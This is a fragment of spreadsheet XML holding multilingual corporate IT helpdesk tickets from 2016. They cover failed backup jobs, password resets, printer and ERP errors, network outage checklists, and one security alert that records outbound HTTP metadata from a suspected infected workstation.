  </si>
  <si>
    <t>install zebra \we_wu102 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>install company barcode fÃ¼r ewew8323506 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348 failed in job_scheduler at: 09/09/2016 04:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348 failed in job_scheduler at: 09/09/2016 04:32:00</t>
  </si>
  <si>
    <t>ç­”å¤: shipments iak</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wqzarvhx.hfsojckw@gmail.com_x000D_
_x000D_
hi,all_x000D_
i move shipping date to 10th,  dn 9169268127 created, pls help to ship out, </t>
  </si>
  <si>
    <t>wqzarvhx hfsojckw</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_bia_bobje failed in job_scheduler at: 09/09/2016 04:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_bia_bobje failed in job_scheduler at: 09/09/2016 04:34:00</t>
  </si>
  <si>
    <t>security incidents - ( #in33826812 ) : possible malware phone home request - rgtw7402550</t>
  </si>
  <si>
    <t>source ip :83.54.03.93209 
system name :rgtw8513661
user  name:workstation/server
location :usa nvyjtmca xjhpznds/traversecitymi
sep , sms status :
field sales user ( yes / no) :  
dsw event log:
------------------------------------------------------------------------------------
=========================
incident overview
=========================
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the outbound http traffic from the infected device contained the following method data:
protocol: tcp
http method: post
http version: http/1.1
domain: tps10234.doubleverify.com
url path: /event.jpg
user-agent: mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/52.0.2743.116 safari/537.36
content length: 15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
1) ticket only escalation for related events (medium priority ticket and an e-mail only notification).
2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal).
sincerely,
 ctoc
=========================
event data
=========================
related events: [[2 of 2 events not shown due to space constraints]]</t>
  </si>
  <si>
    <t>efdl8111235 - need add. software installed on my new latitude e5470 - storch - tel.: -341</t>
  </si>
  <si>
    <t>efdl8111235 - need add. software installed on my new latitude e5470 - storch - tel.: -341_x000D_
_x000D_
- archiving_tool viewer_x000D_
- hardcopy_x000D_
- reisekosten</t>
  </si>
  <si>
    <t>arbeitsplatz: pc+telefon in germany im bÃ¼ro kÃ¼ffner/wÃ¶lfel einrichten</t>
  </si>
  <si>
    <t>auf grund das ich ab jetzt einen tag in der woche in germany bin um die azubis die in germany  stationiert sind zu betreuen benÃ¶tige ich einen arbeitsplatz in germany.</t>
  </si>
  <si>
    <t>access to below applications</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
please provide the access to below applications._x000D_
_x000D_
1.       company engineering tool._x000D_
_x000D_
2.       business_client_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need to add lxkecjgr fwknxupq to shared mailbox</t>
  </si>
  <si>
    <t>erp transaktion pr05 funktioniert nicht</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ida.financial@company.com
hallo,
die erp transaktion pr05 zeigt folgende fehlermeldung:
[cid:image001.png@01d20a74.bee4de80]
mit freundlichen grÃ¼ÃŸen
ida financial
quality technician
email: ida.financial@company.com&lt;mailto:ida.financial@company.com&gt;
geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>xfznctqa xstndbwa</t>
  </si>
  <si>
    <t>erp SID_34 account password is locked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: fwkxbley.stndeick@gmail.com
hi:
users:  sonhygg
erp SID_34 account password is locked, unlock help,</t>
  </si>
  <si>
    <t>fwkxbley stndeick</t>
  </si>
  <si>
    <t>source ip :83.54.03.93209 
system name :rgtw8513661
user  name:workstation/server
location :usa nvyjtmca xjhpznds/traversecitymi
sep , sms status :
field sales user ( yes / no) :  
dsw event log:
------------------------------------------------------------------------------------
=========================
incident overview
=========================
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the outbound http traffic from the infected device contained the following method data:
protocol: tcp
http method: post
http version: http/1.1
domain: tps10234.doubleverify.com
url path: /event.jpg
user-agent: mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/52.0.2743.116 safari/537.36
content length: 15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1) ticket only escalation for related events (medium priority ticket and an e-mail only notification).
2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal).
sincerely,
 ctoc
=========================
event data
=========================
related events: [[2 of 2 events not shown due to space constraints]]</t>
  </si>
  <si>
    <t>wifi guest account</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: scjxobhd.ldypjkmf@gmail.com
hello help team,
a meeting is scheduled at fÃ¼rth on september 14 &amp; 15.
can you pls. arrange wifi guest accounts for the two external trainers for both days:
names:
1.       utthku tehrsytu
email: utthku.tehrsytu@de.bosch.com&lt;mailto:utthku.tehrsytu@de.bosch.com&gt;
2.       uwe tryhutehdtui
email: uwe.tryhutehdtui@de.bosch.com&lt;mailto:uwe.tryhutehdtui@de.bosch.com&gt;
</t>
  </si>
  <si>
    <t>unlock exchange active sync for ios for vmthcrkf iceyusnd (pipfhypeu) : company device.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xvwchsdg.pladjmxt@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
is it possible to have exchange active sync for ios unlocked in advance prior to getting the normal email which shall be forwarded??_x000D_
_x000D_
vmthcrkf iceyusnd will be receiving his iphone today and it would be good if he can use it immediately._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>bei mp60 funktioniert das fax nicht mehr.</t>
  </si>
  <si>
    <t>ordner mbs</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pnroqajb.psbyfhkg@gmail.com_x000D_
_x000D_
hallo helpteam,_x000D_
_x000D_
im departmentlaufwerk von germany steel ist im ordner ehs der unterordner mbs verschwunden. bitte wieder herstellen._x000D_
_x000D_
vielen dank!_x000D_
_x000D_
viele grÃ¼ÃŸe / best </t>
  </si>
  <si>
    <t>pnroqajb psbyfhkg</t>
  </si>
  <si>
    <t>outlook search not working.</t>
  </si>
  <si>
    <t>well i have an issue with search tool of my outlook_x000D_
whenever i m connected to net, it works but when m working offline, it does nt wrk at all</t>
  </si>
  <si>
    <t>ftgvlneh aitsgqwo</t>
  </si>
  <si>
    <t>please help enable the o365 video service</t>
  </si>
  <si>
    <t>die angehÃ¤ngten video die ich per e-mail Ã¼ber office 365 bekommen lassen sich nicht Ã¶ffnen!!_x000D_
_x000D_
die videos von  "letÂ´s talk" kann ich nicht ansehen.</t>
  </si>
  <si>
    <t>ymoeqrsx rbctdsyi</t>
  </si>
  <si>
    <t xml:space="preserve">ie browser issue </t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool :company issue </t>
  </si>
  <si>
    <t>engineering_tool :company issue : forbidden error</t>
  </si>
  <si>
    <t>cugjzqlf djwbyact</t>
  </si>
  <si>
    <t>attendance_tool login issue</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:problem with attendance_tool</t>
  </si>
  <si>
    <t>jchlkard tcaiyjfg</t>
  </si>
  <si>
    <t>login problem with attendance_tool portal</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jchlkard.tcaiyjfg@gmail.com
dear sir,
im facing a problem to login in attendance_tool portal.
please help to solve the issue.
</t>
  </si>
  <si>
    <t>network outage: united kingdom(company): united kingdom-company-dmvpn-1811-rtr02 went down at 11:03 pm et on 09/08. backup is up</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______11:03 pm et on 09/08. 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______    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   __yes______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ___na_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_search_server_dev_daily failed in job_scheduler at: 09/08/2016 23:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         10          _x000D_
  failed disk agents ...........          0          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         10          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          1          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          2          _x000D_
  ===========================================      _x000D_
  mbytes total .................   58614 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          0    _x000D_
_x000D_
===============================================================_x000D_
job bkwin_search_server_dev_daily failed in job_scheduler at: 09/08/2016 23:22:00</t>
  </si>
  <si>
    <t>copy window 7 at monitor</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ujbaemlc.ilzhrxjo@gmail.com_x000D_
_x000D_
hi team_x000D_
_x000D_
please fix problem copy window 7 at monitor, </t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38hotf failed in job_scheduler at: 09/08/2016 22:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[major] from: bma@HostName_1302.hq.company.com "lib6_drive1"  time: 9/8/2016 10:01:54 pm_x000D_
[90:51]   /dev/rmt36.1_x000D_
 cannot write to device ([5] i/o error)_x000D_
_x000D_
_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         14          _x000D_
  failed disk agents ...........          1          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         15          _x000D_
  ===========================================      _x000D_
  completed media agents .......          0          _x000D_
  failed media agents ..........          2          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          2          _x000D_
  ===========================================      _x000D_
  mbytes total .................  378146 mb        _x000D_
  used media total .............          2          _x000D_
  disk agent errors total ......          1    _x000D_
_x000D_
===============================================================_x000D_
= exit status           : 11_x000D_
= system time (seconds) : 0     elapsed time (minutes) : 82_x000D_
= user time (seconds)   : 0_x000D_
= thu 09/08/16 22:05:23 eastern daylight time_x000D_
===============================================================_x000D_
_x000D_
job SID_38hotf failed in job_scheduler at: 09/08/2016 22:05:00</t>
  </si>
  <si>
    <t>outlook æ‰“å¼€å¯åŠ¨æç¤ºé”™è¯¯ã€‚</t>
  </si>
  <si>
    <t>mpjoszqg wurpohmf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2555 failed in job_scheduler at: 09/08/2016 22:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2555 failed in job_scheduler at: 09/08/2016 22:00:00</t>
  </si>
  <si>
    <t>india , company-ap-ind--pu5-lean-2960s-stack-sw01 went down on 9/8/2016 7:59 pm</t>
  </si>
  <si>
    <t>india , company-ap-ind-kirty-pu5-lean-2960s-stack-sw01 went down on 9/8/2016 7:59 pm
gigabitethernet1/0/52 Â· uplink to company-ap-ind--pu5-lean-2960s-stack-sw01 on company-ap-ind-pu5-gf-2960s-access-sw01.company.com is down</t>
  </si>
  <si>
    <t>è½¬å‘: finished: start of s&amp;op process</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
received from: lkrfndev.kztlojin@gmail.com_x000D_
_x000D_
helloï¼Œit help_x000D_
_x000D_
since our territory sales director has been resigned ,i need response for reviewing forecast in futureï¼Œcan you please help assign this approval authorizationï¼ˆs&amp;opï¼‰ï¼Œ</t>
  </si>
  <si>
    <t>lkrfndev kztlojin</t>
  </si>
  <si>
    <t>i have a erp issue. reversed dn 9168001220 for sales order 35934132 when i went to valn2 to complete delivery. i get thi</t>
  </si>
  <si>
    <t>name:maghyuigie ghjkzalez
language:
browser:microsoft internet explorer
email:houcdelq.wnypackq@gmail.com
customer number:
telephone:
summary:hi it team
i have a erp issue. reversed dn 9168001220 for sales order 35934132 when i went to valn2 to complete delivery. i get this message value of modific. counter for doc 1146045243 in supply_chain is 0, but should be 5 please help.</t>
  </si>
  <si>
    <t xml:space="preserve">skype audio not working._x000D_
-connected to the user system using teamviewer._x000D_
-updated the audio drivers after checking the sound settings._x000D_
-restarted the pc._x000D_
-audio is now working fine._x000D_
-issue resolved._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_562 failed in job_scheduler at: 09/08/2016 17:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_562 failed in job_scheduler at: 09/08/2016 17:53:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39hotf failed in job_scheduler at: 09/08/2016 17:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39hotf failed in job_scheduler at: 09/08/2016 17:54:00</t>
  </si>
  <si>
    <t>netzwerkkabel des erp druckers verlÃ¤ngern,</t>
  </si>
  <si>
    <t>netzwerkkabel des erp druckers em 19 verlÃ¤ngern (bÃ¼ro heiner sponsel)</t>
  </si>
  <si>
    <t xml:space="preserve">need to add the pc lvlw8517820 to domain </t>
  </si>
  <si>
    <t>pmqansex nvihmbwc</t>
  </si>
  <si>
    <t>erp netweaver business client will not open drawings.</t>
  </si>
  <si>
    <t>name:xyjkndus ltcevgap
language:
browser:microsoft internet explorer
email:xyjkndus.ltcevgap@gmail.com
customer number:
telephone:
summary:erp netweaver business client will not open drawings.</t>
  </si>
  <si>
    <t>xyjkndus ltcevgap</t>
  </si>
  <si>
    <t>what is the easiest way to change all of my passwords?</t>
  </si>
  <si>
    <t>name:slrgconp onukdesq
language:
browser:microsoft internet explorer
email:slrgconp.onukdesq@gmail.com
customer number:
telephone:
summary:what is the easiest way to change all of my passwords?</t>
  </si>
  <si>
    <t>ticket update for ticket_no0438583</t>
  </si>
  <si>
    <t>kpuqlzwh lbpiyquf</t>
  </si>
  <si>
    <t xml:space="preserve">user name for fabxjimdghtyo depfugcy </t>
  </si>
  <si>
    <t>vip 2: printer hr14  not printing pdf document.</t>
  </si>
  <si>
    <t xml:space="preserve">printer hr14  not printing pdf document.
-connected to the user system using teamviewer 
-deleted the printer and readded the printer , able to print word docs,not able to print pdf docs.
-user has been having this issue again.
-user needs a local it take a look aerp.
computer name: lhol8516104
-contact: </t>
  </si>
  <si>
    <t>name:mfeyouli ndobtzpw
language:
browser:microsoft internet explorer
email:mfeyouli.ndobtzpw@gmail.com
customer number:
telephone:
summary:please reset windows password and erp password for laffekr</t>
  </si>
  <si>
    <t>vendor needs to save files to his local pc.</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
please reference inc1548324.  i have another vendor - vvnookr - involved in the usa carve-out project that needs to save files to his local pc. can you add vvnookr to the exceptions group?  nicrhty edmhihryu will approve if necessary.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp runtime error.....this is what i'm eventually seeing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jbfmsxik.mfzjncva@gmail.com_x000D_
_x000D_
good afternoon:_x000D_
_x000D_
i'm having some difficulty looking up some top notch drawingsâ€¦i keep getting this "time out" error screen come up.  i'm looking these drawings up under the cv04n page.  i was directed to do the following to see these top notch drawings.  i'm not sure if it's a permissions problem or an erp problem.  any way you all could shed some light on this??_x000D_
_x000D_
_x000D_
[cid:image002.png@01d209e4.3e33a090]_x000D_
_x000D_
here's what i get when i try to look up those drawingsâ€¦.._x000D_
_x000D_
[cid:image001.png@01d209b7.ee5552c0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jbfmsxik mfzjncva</t>
  </si>
  <si>
    <t>ticket update for inplant_858584</t>
  </si>
  <si>
    <t>pnacqfso ojwkmzcb</t>
  </si>
  <si>
    <t>snagit</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lucgnhda.carthy@company.com
does company have a corporate license for snagit editor 12?
--
qmglkaru qiwhfkdv
manager business systems,
lucgnhda.carthy@company.com
crm news!
it's here! with the final release of the fy16 dynamics crm project, the microsoft dynamics crm mobile app is now available for download for all crm users. the app can be installed on any ios, android or windows phone or tablet, including the dell 2-in-1 windows 8.1 tablet/laptop.
for more details on the app, watch the launch video&lt;
need help with your dynamics crm?
click here&lt;
chat with a live agent about your dynamics crm now! click here&lt;
</t>
  </si>
  <si>
    <t>name:oikhfqyl gcknzthb
language:
browser:microsoft internet explorer
email:oikhfqyl.gcknzthb@gmail.com
customer number:
telephone:
summary:cannot get onto outlook.  just get the blue screen with the dots moving at the bottom.  tried cold boot thrgxqsuojr xwbesorfs.</t>
  </si>
  <si>
    <t>oikhfqyl gcknzthb</t>
  </si>
  <si>
    <t>user harrfgyibs locked out of erp mii system.</t>
  </si>
  <si>
    <t>user harrfgyibs locked out of erp mii system.
help the user login after unlocking the user account.
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1388 failed in job_scheduler at: 09/08/2016 13:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1388 failed in job_scheduler at: 09/08/2016 13:20:00</t>
  </si>
  <si>
    <t>telecom_vendor_3  dongle</t>
  </si>
  <si>
    <t>help to configure the  dongle on new laptop.</t>
  </si>
  <si>
    <t>id04 printer</t>
  </si>
  <si>
    <t>printer setup</t>
  </si>
  <si>
    <t>id 08 printer issue</t>
  </si>
  <si>
    <t>id08 printer not working</t>
  </si>
  <si>
    <t>yszdlwph kwvtrjxm</t>
  </si>
  <si>
    <t>user wants this messgage recall aerp.-urgent</t>
  </si>
  <si>
    <t xml:space="preserve">user wants this messgage recall aerp.-urgent
</t>
  </si>
  <si>
    <t>fgsmwvcp uoxkzwes</t>
  </si>
  <si>
    <t>erp response time is very long - even for simple transactions - please check - plant vSID_62 is reporting.</t>
  </si>
  <si>
    <t>circuit outage: apac company secondary vpn circuit is down since 12:34 pm on 09/08 et site is up on primary mpls</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __yes__(slo)_     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______12:34 pm on 09/08 et ________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___na____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _____na__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____na_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _______na____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _____na____________________       _x000D_
_x000D_
12. notified  gsc  __na______     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>ticket update on ticket_no0434290</t>
  </si>
  <si>
    <t>outlook constantly freezes up.</t>
  </si>
  <si>
    <t>contact me @ xt 154712 if needed.  no error messages.</t>
  </si>
  <si>
    <t>unable to update password on password_management_tool</t>
  </si>
  <si>
    <t>mapping network drive</t>
  </si>
  <si>
    <t>cad pc for main training room</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gdkiehbr.kdithjsr@gmail.com_x000D_
_x000D_
please configure and install a cad machine under the av cabinet in the new training room. the machine needs the standard cad configuration. please also install a wireless mouse, keybankrd, and 3d cad manipulator._x000D_
the machine will need to be setup for multiple users to sign on with their credentials. per the request of ehs it will also need a dvd drive to play safety training videos._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tfesaxip.cvorpnth@gmail.com_x000D_
_x000D_
unable to convert a planned order for this item. also unable to create a production order for this item. received this error message both times._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">drive2 is not responding to mount requests for library-5, </t>
  </si>
  <si>
    <t>cannot log into skype</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lijrvdgh.wfhmdsoa@gmail.com_x000D_
_x000D_
i cannot log into skype.  it is saying my credentials are bad._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lijrvdgh wfhmdsoa</t>
  </si>
  <si>
    <t>vm lhqsm68267 taking excessive length of time to release backup snapshot.</t>
  </si>
  <si>
    <t>the backup_tool backup for lhqsm68267 is taking over 14 hours to release the snapshot at the end of the backup.  can you look at this vm and advise if there is a problem with lhqsm68267.</t>
  </si>
  <si>
    <t>txinpadm dluxikjn</t>
  </si>
  <si>
    <t xml:space="preserve">ticket update on inc1549550 </t>
  </si>
  <si>
    <t>password reset for erp SID_34 account</t>
  </si>
  <si>
    <t>quantum oracle database connection is not working</t>
  </si>
  <si>
    <t>HostName_1317 and HostName_1316 databases listener is not functioning when ever we try to uacyltoe hxgaycze the connection it doesn't connect this is affection production.  production is not down this is just making the users enter data manually.  the databases are "quantum" and "glog2"_x000D_
_x000D_
ip addresses:_x000D_
HostName_1317 10.170.140.10_x000D_
proglovia  10.170.140.30_x000D_
_x000D_
here is the ip address for the cisco ucs manager console 89.96.26.1800_x000D_
i've tried every set of credentials that i have access.  did anyone change the credentials_x000D_
_x000D_
HostName_1316 and HostName_1317 have been restarted as requested.  please check the database listener for databaseslisted below_x000D_
_x000D_
quantum_x000D_
glog2_x000D_
glog2old</t>
  </si>
  <si>
    <t>can't create a delivery note for a sto # 5019104863 from plant_120 to plant_348</t>
  </si>
  <si>
    <t xml:space="preserve">we can't create a delivery note for a sto # 5019104863 from plant_120 to plant_348 for all 4 items._x000D_
all items in that sto are available in stock in plant_120, but the system does not see it._x000D_
please check and generate a delivery note._x000D_
it is quite urgent as the drum #7262112 needs to be sent further to apac for the exposition in apac._x000D_
</t>
  </si>
  <si>
    <t>vpn access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: khspqlnj.npgxuzeq@gmail.com_x000D_
_x000D_
i am unable to access some network folders when connected to vpn_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>node germany pbx trunk card located at germany is down at 9:33 pm et on 09/08.</t>
  </si>
  <si>
    <t>need access to znqcljxt azvoespk's collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">contact : </t>
  </si>
  <si>
    <t>npc 311104334 - "plant not selected"</t>
  </si>
  <si>
    <t xml:space="preserve">i was notified by kuznvase jrxtbuqz that this npc is having an issue. apparently, the plant was not selected during the execution of the task. please investigate and talk to thilo for my specifics. </t>
  </si>
  <si>
    <t>my SID_39 crm has problem-please help to fix it aerp, thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zmkitbsh.bxsyaipz@gmail.com_x000D_
_x000D_
dear it helper,_x000D_
_x000D_
please see below message. when i am trying to process on this complaint 7611183861, it didn't allow me to change anything, it says this crm is being processed by user sundj, and i am sundj. would you please help me to fix it? i have reboot my computer, but this message is still there._x000D_
_x000D_
_x000D_
[cid:image001.png@01d20a16.847d2d00]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>problem with crm</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
when i signed into crm i got and error message. the reporting_engineering_tool didn't load. see below.
[cid:image001.jpg@01d209a9.900c3d90]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>error when trying to access SID_1 quality system in erp.</t>
  </si>
  <si>
    <t>zirsbqca ohxsweji</t>
  </si>
  <si>
    <t>u drive access</t>
  </si>
  <si>
    <t xml:space="preserve">hello, for the next one month i will be in bedord, usa. i request to provide access to u drive (\\ldbsm010\engineering_application\) since its taking up too much time to open nx documents from engineering tool with the current u drive path (\\HostName_96\engineering_application). kindly process aerp. </t>
  </si>
  <si>
    <t xml:space="preserve">lizenz </t>
  </si>
  <si>
    <t>let's talk- video kann nicht geÃ¶ffnet werden</t>
  </si>
  <si>
    <t>lfaqrivo bmitazrx</t>
  </si>
  <si>
    <t>usa nc server HostName_1326 is not responding, no access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rmzlvqjf.eaqyxljb@gmail.com_x000D_
_x000D_
hello help team,_x000D_
attached you will find the agreement. what do i need to do next to get e-mail push, calendar synchronization etc.?_x000D_
_x000D_
mit freundlichem gruÃŸ / best </t>
  </si>
  <si>
    <t>rmzlvqjf eaqyxljb</t>
  </si>
  <si>
    <t>sync hr org details to purchasing</t>
  </si>
  <si>
    <t>sync hr org details to purchasing for dhmfuvgw jralkfcb (hufghygh).  he is getting the following error: 
no data found for employee '1111196977', inform system administration.</t>
  </si>
  <si>
    <t>duplicate machines displaying in machine list</t>
  </si>
  <si>
    <t>when a work center is changed on a machine in erp pm the machine with the old and new work center appear in the machine list in mii</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vkezwolt.fgnqzeai@gmail.com_x000D_
_x000D_
kind attn:_x000D_
_x000D_
kindly resolve subject issue at the earliest._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>drucker ng15 funktioniert nicht mehr (hardware problem), dringend benÃ¶tigt fÃ¼r auftragspapiere und bestellungen</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</si>
  <si>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hp laserjet 600_x000D_
 _x000D_
   â€¢  detailed description of the problem ? papier staut sich, es kommt kein ausdruck raus_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) erp_x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?_x000D_
_x000D_
   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm) SID_34_x000D_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</si>
  <si>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ogasxnpw cfvqrhap</t>
  </si>
  <si>
    <t>problem in engineering tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zaeduhlt.jdgsamtv@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
ich habe ein problem beim Ã¼bertragen eines berirtchts in das engineering tool system._x000D_
_x000D_
siehe das gelbe feld unten._x000D_
schon mehrere male habe ich die felder ausgefÃ¼llt und gespeichert._x000D_
_x000D_
wenn ich den berirtcht in das system Ã¼bertagen mÃ¶chte, gibt es eine fehlermeldung:_x000D_
_x000D_
siehe anhang_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d209bf.4ac78940]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / with best </t>
  </si>
  <si>
    <t>zaeduhlt jdgsamtv</t>
  </si>
  <si>
    <t>blank call from germany - interaction id - 2064209888</t>
  </si>
  <si>
    <t>2md extenral monitor will not stay one, it flashes briefly then goes out.</t>
  </si>
  <si>
    <t>travel expenses in erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uyrpdvoq.mbzevtcx@gmail.com
hi
i get this information when i want to do my travel expenses
zero amount
[cid:image002.png@01d209d4.05d99cf0]
but i entered the numbers as below
[cid:image003.png@01d209d4.05d99cf0]
[cid:image004.png@01d209d4.05d99cf0]
uyrpdvoq mbzevtcx
sales manager earthworks european served area â€“ north
uyrpdvoq.mbzevtcx@gmail.com&lt;mailto:uyrpdvoq.mbzevtcx@gmail.com&gt;
company infrastructure gmbh
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq
www.company.com&lt;
</t>
  </si>
  <si>
    <t>telephony_software interaction desktop fails to connect</t>
  </si>
  <si>
    <t>this seems to have started after windows update kb4283716 got installed on user's pc._x000D_
please find screenshot in the attached email.</t>
  </si>
  <si>
    <t>please check the ale in detail, we have ongoing issues with sending data from hrp to SID_34 and SID_39 - assign to sreedhar</t>
  </si>
  <si>
    <t>please have a close look on the ale interface in production environment, i did work through some requests about expense reporting issues and i found out, that many changes in hrp did not move to SID_34 via ale, even when the data was fine on hr side. for example the changes in it around stefyty and tom were not reflected in SID_34, it looks like the majority of changes since at least 2 or 3 months were not synced. i'm not sure, if nothing went over, some did, but could be because of manual runs of ale by the hris team.</t>
  </si>
  <si>
    <t>pesylifc wnyierbu</t>
  </si>
  <si>
    <t>drucker hp laserjet 3525 (mp 72) defekt</t>
  </si>
  <si>
    <t>hp drucker cp3525 defekt, wurde bereits ausgetauscht (hp laserjet 500)</t>
  </si>
  <si>
    <t>reset passwords for davidthd robankm using password_management_tool password reset.</t>
  </si>
  <si>
    <t>zelunfcq yimdwjrp</t>
  </si>
  <si>
